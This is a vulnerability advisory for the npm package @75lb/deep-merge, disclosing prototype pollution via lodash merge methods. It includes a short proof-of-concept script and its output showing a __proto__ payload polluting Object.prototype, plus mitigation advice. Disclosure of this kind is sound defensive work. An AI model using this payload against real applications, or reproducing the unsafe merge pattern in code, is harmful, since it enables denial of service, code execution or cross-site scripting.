All versions of this package are vulnerable to Prototype Pollution due to reliance on vulnerable merge methods of lodash to merge objects. An attacker can manipulate the prototype of an object, potentially leading to the alteration of behavior of all objects inheriting from the affected prototype by modify built-in Object.prototype through reachable special properties __proto__
and constructor.prototype
. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.
(async () => {
const lib = await import('@75lb/deep-merge');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.default ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
This package has no security updates on the mentioned vulnereability, therefore, users should ensure proper santization and validation over user's supplied inputs. Blocking inputs containing __proto__
, contructor.prototype
Update: Disclosed publicly following three months of no provided fix from the maintainer.